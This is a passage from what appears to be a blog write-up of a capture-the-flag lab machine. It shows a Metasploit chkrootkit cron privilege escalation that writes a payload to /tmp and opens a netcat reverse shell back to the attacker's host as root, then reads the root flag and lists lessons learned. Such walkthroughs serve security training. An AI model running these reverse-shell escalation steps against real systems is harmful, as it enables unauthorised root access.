   ----        ---------------       --------  -----------
   CHKROOTKIT  /usr/sbin/chkrootkit  yes       Path to chkrootkit
   SESSION                           yes       The session to run this module on


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.176.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(unix/local/chkrootkit) > set LHOST 192.168.187.130
LHOST => 192.168.187.130
msf6 exploit(unix/local/chkrootkit) > set LPORT 7777
LPORT => 7777
msf6 exploit(unix/local/chkrootkit) > set SESSION 2
SESSION => 2
msf6 exploit(unix/local/chkrootkit) > run

[!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: linux
[*] Started reverse TCP handler on 192.168.187.130:7777 
[!] Rooting depends on the crontab (this could take a while)
[*] Payload written to /tmp/update
[*] Waiting for chkrootkit to run via cron...
[+] Deleted /tmp/update
[*] Command shell session 3 opened (192.168.187.130:7777 -> 192.168.187.137:46062 ) at 2023-02-13 00:27:07 -0500

id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls -alh
total 24K
drwx------  3 root root 4.0K Nov  5  2019 .
drwxr-xr-x 22 root root 4.0K Nov  5  2019 ..
-rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
-rw-r--r--  1 root root  408 Nov  5  2019 final.txt
drwxr-xr-x  3 root root 4.0K Nov  5  2019 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
cat final.txt
                                                                   
!! Congrats you have finished this task !!

Contact us here:

Hacking Articles : https://twitter.com/rajchandel/
Geet Madan : https://in.linkedin.com/in/geet-madan

+-+-+-+-+-+ +-+-+-+-+-+-+-+
 |E|n|j|o|y| |H|A|C|K|I|N|G|
 +-+-+-+-+-+ +-+-+-+-+-+-+-+
____________________________________

Privilege escalation succeeded and the root flag was obtained.

Lessons learned

  1. The first key point of this machine is interpreting nfubxn.cpncat; it really does not look like a domain name, and in that case ROT13 encoding should be considered.

  2. When files can be uploaded via FTP, remember that an SSH public key can be uploaded.

  3. This machine gave practice with Metasploit's post modules for privilege escalation.

posted @ 2023-02-13 13:31  Jason_huawen